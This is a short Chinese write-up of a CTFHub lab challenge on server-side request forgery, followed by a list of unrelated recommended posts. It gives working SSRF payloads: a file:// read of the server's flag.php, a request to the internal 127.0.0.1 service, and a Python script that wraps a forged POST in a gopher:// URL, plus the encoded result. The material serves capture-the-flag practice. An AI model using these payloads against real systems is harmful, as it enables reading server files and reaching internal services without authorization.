CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
BomanLj1 小时前
NSK W1202KA-3P-C3Z5 不锈钢精密滚珠丝杠技术规范
经验分享·规格说明书
菩提小狗3 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
BomanGe45 小时前
NSK百吨级超重载高速静音丝杠技术详解
经验分享·规格说明书
GMICLOUD5 小时前
GMI Cloud 登陆 WAIC 2026 领航舞台,透传全栈全球化 AI 基建,联合媒体及多家企业发布AI出海白皮书
经验分享
Bomangedd5 小时前
NSK滚珠丝杠RNFTL3232A3S技术手册
经验分享·规格说明书
郭泽斌之心5 小时前
给 AI 交易助手做 LLM 网关:多通道负载均衡 + 静默失败自动切换
人工智能·经验分享·ea·mt5·fay数字人·easydeal
中云DDoS CC防护蔡蔡5 小时前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
BomanGe46 小时前
【无标题】
经验分享·规格说明书
BomanGe17 小时前
NSK HTF5010-7.5 重载滚珠丝杠技术解析
经验分享·规格说明书
半导体守望者8 小时前
MKS C系列MFC CMA10 CMA50快速紧凑型手侧与PC联网教程软件驱动USB
经验分享·笔记·功能测试·自动化·制造